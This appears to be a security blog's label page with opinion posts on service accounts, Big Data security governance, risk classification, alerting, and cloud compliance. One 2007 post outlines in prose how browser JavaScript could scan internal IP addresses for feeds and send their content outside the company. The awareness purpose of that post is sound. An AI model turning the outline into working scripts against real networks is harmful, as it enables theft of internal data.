Showing posts with label security. Show all posts
Showing posts with label security. Show all posts

Thursday, September 17, 2020

Service Accounts suck - why data futures require end to end authentication.

 Can we all agree that "service" accounts suck from a security perspective.  Those are the accounts that you set up so what system/service can talk to another one.  Often this will be a database connection so the application uses one account (and thus one connection pool) to access the database.  These service accounts are sometimes unique to a service or application, but often its a standard service account for anything that needs to connect to a system.

The problem with that is that you've therefore got security defined at the service account level, not at all based on the users actually using it.  So if that database contains the personal information of every customer then you are relying on the application to ensure that they only display the information for a given customer, the security isn't with the data its with the application.

Back in 2003 a group called the "Jericho Forum" set up under Open Group to look at the infrastructural challenges of de-perimeterisation and they created a set of commandments the first of which is:
The scope and level of protection should be specific and appropriate to the asset at risk. 

Service accounts break this commandment as they take the most valuable asset (the data) and effectively remove security scope and place it in the application.   What needs to happen is that the original requestor of the information is authenticated at all levels, like with OAuth, so if I'm only allowed to see my data then if someone makes an error in the application code, or I run a Bobby Drop Tables attack, my "Select *" only returns my records.

This changes a lot of things, connection pooling for starters, but when you are looking at reporting in particular we have to get away from technologies that force systems accounts and therefore require multiple security models to be implemented within the consumption layer.

The appropriate level to protect data is at the data level and the scope is with the data only by shifting our perception of data from being about service accounts and databases to being about data being the asset can we start building security models that actually secure data as an asset.

Today most data technologies assume service accounts, this means that most data technologies don't think that data is an asset.  This has to change.

Thursday, January 15, 2015

Security Big Data - Part 7 - a summary

Over six parts I've gone through a bit of a journey on what Big Data Security is all about.
  1. Securing Big Data is about layers
  2. Use the power of Big Data to secure Big Data
  3. How maths and machine learning helps
  4. Why its how you alert that matters
  5. Why Information Security is part of Information Governance
  6. Classifying Risk and the importance of Meta-Data
The fundamental point here is that encryption and ACLs provide only a basic hygiene factor when it comes to securing Big Data.  The risk and value of information is increasing and by creating Big Data solutions businesses are creating more valuable and therefore more at risk information solutions.  This means that Information Security needs to become a fundamental part of Information Governance and that new ways of securing that information are required.

This is where Big Data comes to its own rescue through the use of large data sets which enable new generations of algorithms to identify and then alert based on the risk and the right way to handle it.  This all requires you to consider Information Security as a core part of the Meta-data that is captured and governed around information.

The time to start thinking, planning and acting on Information Security is now, its not when you become the next Target or when one of your employees becomes your own personal Edward Snowden, its now and its about having a business practice and approach that considers information as a valuable asset and secures it in the same way as other assets in a business are secured. 

Big Data Security is a new generation of challenges, and a new generation of risks, these require a new generation of solutions and a new corporate culture where information security isn't just left to a few people in the IT department.

Tuesday, January 13, 2015

Securing Big Data Part 6 - Classifying risk

So now your Information Governance groups consider Information Security to be important you have to then think about how they should be classifying the risk.  Now there are docs out there on some of these which talk about frameworks.  British Columbia's government has one for instance that talks about High, Medium and Low risk, but for me that really misses the point and over simplifies the problem which ends up complicating implementation and operational decisions.

In a Big Data world its not simply about the risk of an individual piece of information, its about the risk in context.  So the first stage of classification is "what is the risk of this information on its own?" its that sort of classification that the BC Government framework helps you with.  There are some pieces of information (The Australian Tax File Number for instance) where their corporate risk is high just as an individual piece of information.  The Australian TFN has special handling rules and significant fines if handled incorrectly.  This means its well beyond "Personal Identification Information" which many companies consider to be the highest level.  So at this level I'd recommend having Five risk statuses

  1. Special Risk - Specific legislation and fines apply to this piece of information
  2. High - losing this information has corporate reputation and financial risk
  3. Medium - losing this information can impact corporate competitiveness
  4. Low - losing this information has no corporate risk
  5. Public - the information is already public
The point here is that this is about information as a single entity, a personal address, a business registration, etc.  That is only the first stage when considering risk.

The next stage is considering the Direct Aggregation Risk this is about what happens when you combine two pieces of information together, do that change the risk.  The categories remain the same but here we are looking at other elements.  So for instance address information would be low risk or public, but when combined with a person that link becomes higher risk.  When looking at corporate information on sales that might be medium risk, but when that is tied to specific companies or revenue it could become a bigger risk.  Also at this stage you need to look at the policy of allowing information to be combined and you don't want to have a "always no" policy.

So what if someone wants to combine personal information with twitter information to get personal preferences?  Is that allowed?  What is the policy for getting approval for new aggregations, how quickly is risk assessed and is business work allowed to continue while the risk is assessed? When looking at Direct Aggregation you are often looking at where the new value will come from in Big Data so you cannot just prevent that value being created.  So setting up clear boundaries of where approval is required (combining PII information with new sources requires approval for instance) and where you can get approval after the fact (sales data with anything is ok, we'll approve at the next quarterly meeting or modify policy).

The final stage is the most complex its the Indirect Aggregation Risk that is the risk of where two sets of aggregated results are combined and though independently they are not high risk the pulling together of that information constitutes a higher level risk.  The answer to this is actually to simplify the problem and consider aggregations not as just aggregations but as information sources in their own right. 

This brings us to the final challenge in all this classification: Where do you record the risk?

Well this is just meta-data, but that is often the area that companies spend the least amount of time thinking about but when looking at massive amounts of data and particularly disparate data sources and their results then Meta-Data becomes key to big data.  But lets look just at the security side at the moment.


Data Type Direct Risk
Customer Collection Medium
Tax File Number Field Special
Twitter Feed Collection Public

and for Aggregations

Source 1 Source 2 Source 3 Source 4 Aggregation Name Aggregation Risk
Customer Address Invoice Payments Outstanding Consumer Debt High
Customer Twitter Locaiton Customer Locations Medium
Organization Address Invoice Payments Outstanding Company Debt Low


The point here is that you really need to start thinking about how you automate this, what tools you need.  In a Big Data world the heart of security is about being able to classify the risk and having that inform the Big Data anomaly detection so you can inform the right people and drive the risk.

This gives us the next piece of classification that is required which is about understanding who gets informed when there is an information breach.  This is a core part of the Information Governance and classification approach, because its hear that the business needs to say "I'm interested when that specific risk is triggered".  This is another piece of Meta-data and one that then informs the Big Data security algorithms who should be alerted.

If classification isn't part of your Information Governance group, or indeed you don't even have a business centric IG group then you really don't consider either information or its security to be important.

Other Parts in the series
  1. Securing Big Data is about layers
  2. Use the power of Big Data to secure Big Data
  3. How maths and machine learning helps
  4. Why its how you alert that matters
  5. Why Information Security is part of Information Governance

Monday, January 12, 2015

Securing Big Data Part 5 - your Big Data Security team

What does your security team look like today?

Or the IT equivalent, "the folks that say no".  The point is that in most companies information security isn't actually something that is considered important.  How do I know this?  Well because basically most IT Security teams are the equivalent of the nightclub bouncers, they aren't the people who own the club, they aren't as important as the barman, certainly not as important as the DJ and in terms of Nightclub strategy their only input will be on the ropes being set up outside the club.

If Information is actually important then information security is much more than a bunch of bouncers trying to keep undesirables out.  Its about the practice of information security and the education of information security,  in this Information security is actually a core part of Information Governance and Information Governance is very much a business led thing.

Big Data increases the risks of information loss, because fundamentally you are not only storing more information you are centralizing more information which means more inferences can be made, more links made and more data stolen.  This means that historical thefts which stole data from a small number of systems risk being dwarfed by Big Data hacks which steal huge sets or even runs algorithms within a data lake and steals the results.

So when looking at Big Data security you need to split into three core groups
The point here is that this governance is exactly the same as your normal Data governance, its essential that Information Security becomes a foundation element of information governance.  The three different parts of governance are set up because there are different focuses

  1. Standards - sets the gold standard of what should be achieved
  2. Policy - sets what can be achieved right now (which may not meet the gold standard)
  3. KPI Management - tracks compliance to the gold standard and adherence to policy
The reason these are not just a single group is that the motivations are different.  Standards groups set up what would be ideal, its against this ideal that progress can be tracked.  If you combine Standards groups with Policy groups you end up with Standards which are 'the best we can do right now' which doesn't give you something to track towards over multiple years.

KPI management is there to keep people honest.  This is the same sort of model I talked about around SOA Governance and its the same sort of model that whole countries use, so it tends to surprise me when people don't understand the importance of standards v policy and the importance of tracking and judging compliance independently from those executing.

So your Big Data Security team starts and ends with the Information Governance team, if information security isn't a key focus for that team then you aren't considering information as important and you aren't worried about information security.


Other Parts in the series
  1. Securing Big Data is about layers
  2. Use the power of Big Data to secure Big Data
  3. How maths and machine learning helps
  4. Why its how you alert that matters

Friday, January 09, 2015

Securing Big Data - Part 4 - Not crying Wolf.

In the first three parts of this I talked about how Securing Big Data is about layers, and then about how you need to use the power of Big Data to secure Big Data, then how maths and machine learning helps to identify what is reasonable and was is anomalous.

The Target Credit Card hack highlights this problem.  Alerts were made, lights did flash.  The problem was that so many lights flashed and so many alarms normally went off that people didn't know how to separate the important from the noise.  This is where many complex analytics approaches have historically failed: they've not shown people what to do.

If you want a great example of IT's normal approach to this problem then the ethernet port is a good example.
What does the colour yellow mean normally? Its a warning colour, so something that flashes yellow would be bad right?  Nope it just means that a packet has been detected... err but doesn't the green light already mean that its connected?  Well yes but that isn't the point, if you are looking at a specific problem then the yellow NOT flashing is really an issue... so yellow flashing is good, yellow NOT flashing is bad...

Doesn't really make sense does it?  Its not a natural way to alert.  There are good technical reasons to do it that way (its easier technically) but that doesn't actually help people.

With security this problem becomes amplified and is often made worse through centralising reactions to a security team which knows security but doesn't know the business context.  The challenge therefore is to categorize the type of issue and have different mechanisms for each one.  Broadly these risks split into 4 groups
Its important when looking at risks around Big Data to understand what group a risk falls into which then indicates the right way to alert.  Its also important to recognize that as information becomes available an incident may escalate between groups.

So lets take an example.  A router indicates that its receiving strange external traffic.  This is an IT operations problem and it needs to be handled by the group in IT ops which deals with router traffic.  Then the Big Data security detection algorithms link that router issue to the access of sales information from the CRM system.  This escalates the problem to the LoB level, its now a business challenge and the question becomes a business decision on how to cut or limit access.  The Sales Director may choose to cut all access to the CRM system rather than risk losing the information, or may consider it to be a minor business risk when lined up against closing the current quarter.  The point is that the information is presented in a business context, highlighting the information at risk so a business decision can be taken.

Now lets suppose that the Big Data algorithms link the router traffic to a broader set of attacks on the internal network, a snooping hack, this is where the Chief Information Security Officer comes in, that person needs to decide how to handle this broad ranging IT attack, do they shut down the routers and cut the company off from the world?  Do they start dropping and patching, and do they alert law enforcement.

Finally the Big Data algorithms find that credit card data is at risk, suddenly this becomes a corporate reputation risk issue and needs to go to the Chief Risk Officer (or the CFO if they have that role) to take the pretty dramatic decisions that need to be made when a major cyber attack is underway.

The point here though is that it needs to be systematic how its highlighted and escalated, it can't all go through a central team.  The CRO needs to be automatically informed when the risk is sufficient, but only be informed then.  If its a significant IT risk then its the job of the CISO to inform the CRO, not for every single risk to be highlighted to the CRO as if they need to deal with them.

The basic rule is simple: "Does the person seeing this alert care about this issue? Does the person seeing this alert have the authority to do something about this issue? and finally: does the person seeing this alert have someone lower in their reporting chain who answers 'yes' to those questions?"

If you answer "Yes, Yes, No" then you've found the right level and then need to concentrate on the mechanism.  If its "Yes, Yes, Yes" then you are in fact cluttering if you show them everything that every person in their reporting tree handles as part of their job.

In terms of the mechanism its important to think on that "flashing yellow light" on the Ethernet port.  If something is ok then "Green is good", if its an administrative issue (patch level on a router) then it needs to be flagged into the tasks to be done.  If its an active and live issue it needs to come front and center.

In terms of your effort when securing Big Data you should be putting more effort into how you react than on almost any other stage in the chain.  If you get the last part wrong then you lose all the value of the former stages.  This means you need to look at how people work, look at what mechanisms they use, so should the CRO be alerted via a website they have to go to or via an SMS to the mobile they carry around all the time and that take them to a mobile application on that same device? (hint: its not the former).

This is the area where I see the least effort made and the most mistakes being made, mistakes that are normally "Crying Wolf" so you show every single thing and expect people to filter out thousands of minor issues and magically find the things that matter.

Target showed that this doesn't work.



Thursday, January 08, 2015

Securing Big Data - Part 3 - Security through Maths

In the first two parts of this I talked about how Securing Big Data is about layers, and then about how you need to use the power of Big Data to secure Big Data.  The next part is "what do you do with all that data?".   This is where Machine Learning and Mathematics comes in, in other words its about how you use Big Data analytics to secure Big Data.

What you want to do is build up a picture of what represents reasonable behaviour, that is why you want all of that history and range of information.  Its the full set of that across not single actions but millions of actions and interactions that builds the picture of reasonable.  Its reasonable for a sys-admin to access a system, its not reasonable for them to download classified information to a USB stick.

A single request is something you control using an ACL, but that doesn't include the context of the request (its 11pm, why is someone accessing that information at all that late?).

You also need to look at the aggregated requests - They've looked at the next quarters sales forecast while also browsing external job hunting sites and typing up a resignation letter.

Then you need to look at the history of that - Oh its normal for someone to be doing that at quarter end, all the sales people tend to do that.

This gives us the behaviour model for those requests which leads to us understanding what is considered reasonable.  From reasonable we can then identify anomalous behaviour (behaviour that isn't reasonable).

No human defined and managed system can handle this amount of information, but Machine Learning algorithms just chomp up this sort of data and create the models for you.  This isn't a trivial task and its certainly massively more complex than the sorts of ACLs, encryption criteria and basic security policies that IT is used to.  These algorithms need tending, they need tuning and they need monitoring.

Choosing the right type of algorithms (and there are LOTS of different choices) is where Data Scientists come in, they can not only select the right type of algorithm but also tune and tend it so it produces the most effective set of results consistently.

What this gives you however is business centric security, that is security that looks at how a business operates.  Anomalous Behaviour Detection therefore represents the way to secure Big Data by using Big Data.

The final challenge is then on how to alert people so they actually react.

Wednesday, January 07, 2015

Securing Big Data - Part 2 - understanding the data required to secure it

In the first part of Securing Big Data I talked about the two different types of security.  The traditional IT and ACL security that needs to be done to match traditional solutions with an RDBMS but that is pretty much where those systems stop in terms of security which means they don't address the real threats out there, which are to do with cyber attacks and social engineering.  An ACL is only any good if people do what they are expected to do.  Both the Target Credit Card hack and the NSA hack by Edward Snowden involved some sort of insider breach, so ACL approaches were part of the problem not the solution.

With Big Data and Hadoop we have another option: to actually use Hadoop to secure the information in Hadoop.  This means getting more information into Hadoop, particularly network and machine log information.

So why do you need all this information?  Well you need obviously to know the access requests and what data is accessed, but you also need to know where the network packets go.  Are they going to a normal desktop or corporate laptop or do they head out of the company and onto the internet?  Does the machine that is downloading information have a USB drive plugged in and the files being copied to it?  Is there a person logged into the machine or is it just a headless workstation?

The point here is that when looking at securing Big Data you need to take a Big Data view of security.  This means going well beyond traditional RDBMS approaches and not building a separate security silo but instead looking at the information, adding in information about how it is accessed and information about where that is accessed from and how.
This information builds up a single request view, but by storing that information you can start building up a profile of information to understand what other information has been requested and how that matches or can be linked.  Thus if someone makes 100 individual requests that on their own are OK but taken in aggregate represent a threat then its the storage of that history of requests that give you the security.

So to secure Big Data we don't need to just look at individual requests, the ACL model, we need to start building up the broad picture of how the information is accessed, what context it is accessed within and where that information ends up.  To secure Big Data, or in reality any data, is about looking at the business context rather than the technical focus of encryption and ACLs which are simply hygiene factors. 

Tuesday, January 06, 2015

Securing Big Data - Part 1

As Big Data and its technologies such as Hadoop head deeper into the enterprise so questions around compliance and security rear their heads.

The first interesting point in this is that it shows the approach to security that many of the Silicon Valley companies that use Hadoop at scale have taken, namely pretty little really.  It isn't that protecting information has been seen as a massively important thing as there just aren't the basic pieces within Hadoop to do that.  Its not something that has been designed to be secure from day one, its designed to be easy to use and to do a job.  Its as governments and enterprises with compliance departments begin to look at Hadoop that these requirements are really surfacing.

But I'm not going to talk about the encryption and tokenization solutions, those are hygiene factors but not really about securing the information, because its still going to be accessible to people with the right permissions.  Because of that its still at risk from Cyber or Social Engineering attacks.  The means that security for Big Data is about layering and really its about two different ways of viewing security.

IT solutions, technical solutions, can really help around access control, encryption but they don't really help you to actually prevent information being stolen.  What stops information leaking is about the business decisions you make.

The first one of those is: what information do I actually store?  So you might decide that you'll just store IDs for customer information in Hadoop and then use a more traditional store to provide the cross reference of IDs back to customer information when its required.

Above this however is actually using Hadoop to protect Hadoop.  What is Hadoop?  Its a Big Data analytics platform.  What is the biggest threat around Data?  Social Engineering or Cyber 'inside the walls' attacks.  So the first stage in securing Hadoop is to do the IT basics, but the next stage of securing the business of information is about using the power of Hadoop to secure the information stored within it.

Tuesday, January 07, 2014

How integration guys created a data security nightmare

There has been a policy in integration that has stored up a really great challenge of data security, and by great I don't mean 'fantastic' I mean 'aw crap'.  Its a policy that was done for the best of reasons and one that really will in future represent a growing challenge to Big Data and federated information.

The policy can be described as this:
Users authenticate with Apps, Apps authenticate with the database and Apps authenticate with the ESB/EAI/Integration
What this means is that Users don't authenticate against any of the federated data.  This is normally glossed over by saying that 'the source application is responsible for filtering' but the reality is that applications rarely do this terribly well.  Put it this way, most of the time when a front end banking system accessing your account information the only reason its getting your account data is because of the account ID it has, if it for some reason had the wrong account ID stored then it would display something else even though that information isn't yours.

This approach has tended to work for operational systems however because they work in linear ways on data sets, you know what you are showing and you pull out what you want to show.  The trouble is as these federated sets are then shifted into next generation Big Data solutions or accessed in a federated query is that the security model completely breaks down because application to application security doesn't recognise the individual actually making the request.

So now we have a world where the data sources don't do data security and privacy 'by design' they do it 'by functionality'.  So the reason you get your account information is because of that magic ID, but there is nothing stopping a piece of code saying 'return account information from account ID, account ID +1 and account ID +3. Its just practice that stops that rather than a fundamental information security approach.

There are mechanisms that can help with this but historically they've been more pain than its worth.  Its going to be interesting seeing how the next generation of joined up analytics and operational IT estates will retrofit user and role level analytical security into a world of application to application authentication.

Friday, April 10, 2009

You stole my flashing lights

"I don't understand the hardware, I don't understand the software, but I can see the flashing lights"

This sums up the basic problem with cloud adoption and over the last week or so its been even clearer while chatting with some clients and journalists around the issues of cloud.

Simply put the current regulatory, compliance and security world is basically based around that statement.

Security folks don't understand what your application does, but they understand networks, networks are physical things, they understand SSO and how to VLAN and physical LANS and they love the physical separation as its obvious how the security is maintained.

Accountancy folks don't understand any of this but they can look at the data centre, count the flashing lights and know all is good. They can also "audit" this physical environment and feel happily secure that the flashing lights are kept safe by a good bunch of process that makes sure that the flashing lights don't talk to the wrong flashing lights.

Lawyers are retarded by the legal lag that in many cases appears to struggle with the idea of the computer and digital information let alone the concept of the internet and cloud computing. Again its about the physical separation as this is what makes it easiest.

Hardware manufacturers play to the flashing light meme as well, I was in a DC recently and made a comment about the compliance challenges and how people seem to like flashing lights and the chap said "Good point, I mean we even put them on the BOARDS for some reason and in a rack you can't even see those lights".

This is the world that cloud computing really comes against. Worries that "one virtual machine could break into another one on the same processor", concerns that virtual separation is just like stabbing a condom with holes, concerns that because you can't physically audit the separation and that some of the cloud providers won't allow you to stomp around their data centres that in fact everything is insecure.

Before FUDmeisters jump up and scream about "being safe" let me ask you this... when was the last time you demanded a third party audit of your electricity supplier to prove that they wouldn't blast you with 300MV at 1MA? When was the last time your asked for a third party audit on your telco provider to prove they were not eavesdropping on your calls? What about the postal service or delivery company that ship your packages?

IT is of course completely and utterly different.... or is it just that because people have been beguiled by the flashing lights and the physicality and don't want to recognise the new challenges that they really should be addressing. Armadillo security (hard on the outside, soft on the inside) has long been a flaw in many company security approaches and virtualisation just makes that approach more obviously flawed. Approaches like Jericho aim to address the problems of business interaction.

The larger challenge however is in the audit and legal areas, being blunt many of the rules laid down today by legislators or auditors are based on a lack of understanding of the mid-90s and have no hope of applying to the new distributed IT environments. Take the need for an independent 3rd part audit of a cloud providers data-centres including how they provision, manage security and ensure availability. The problem is that IT is treated not as a utility, which is what cloud aims for, but as a physical asset that must be proven in the same way as oil reserves or cash.

The shift to treating IT as a utility needs to overcome these legal, accountancy and security objections and those of the intenral IT department. But to be clear these objections are already being worked around and in time will be overcome. The four FUDMeisters of the cloudpocalyse will lose this battle overtime but the quicker that the regulatory and accountancy rules are changed to recognise the shift of IT into a utility the better.

They can't have the flashing lights, and they need to deal with their loss.




Technorati Tags: ,

Thursday, November 06, 2008

Can the US Government now hack my computer?

Okay so I've decided (for once) to get ahead of the game and register with the new big brother system that will allow me to travel into the US, something that you have to do in advance now

The warning popup is quite a sight
This Department of Homeland Security (DHS) computer system and any related equipment is subject to monitoring for administrative oversight, law enforcement, criminal investigative purposes, inquiries into alleged wrongdoing or misuse, and to ensure proper performance of applicable security features and procedures. As part of this monitoring, DHS may acquire, access, retain, intercept, capture, retrieve, record, read, inspect, analyze, audit, copy and disclose any information processed, transmitted, received, communicated, and stored within the computer system. If monitoring reveals possible misuse or criminal activity, notice of such may be provided to appropriate supervisory personnel and law enforcement officials. DHS may conduct these activities in any manner without further notice. By clicking OK below or by using this system, you consent to the terms set forth in this notice.


The highlight is mine. Does this mean that in order to go to the US I must allow the US government to hack my computer?

The other good bit is that the dialogue only has an OK button, you can't even cancel and get out.

I just thought "you can't do that" then suddenly remembered what the response will be "yes we can".

Technorati Tags: ,

Friday, June 08, 2007

How to use Javascript to circumvent security

One of the things that I've found playing around with Google gadgets and Javascript recently is that these XML libraries very helpfully enable you to pull down XML content from pretty much any site you like. I found this out by accident while playing with the Yahoo libraries and some external software to see if I could pull stuff from my internal machine and put it out onto the external ones. I could.

Now what this means is that with a bit of basic coding, maybe something as simple as doing a loop on http://10.0.0.1/feed and just upping the ip address you might be able to get hold of internal feeds and then submit that content externally. Because the javascript is living in the browser there is no security around the retrieval or submission, because the users SSO will get them internally and they are already sorted on their company proxy.http://www.blogger.com/img/gl.link.gif

As more platforms support "standard" RSS & Atom feeds for information which have standard URI names then the ability of such hunt and find techniques will be much more effective, and because you can use a remote script load approach you can keep your cracking script up to date based on what is working and what is not.

IBM have a good article that goes into the challenges of javascript (and the script tag) and security and what this means for mashups.

Technorati Tags: ,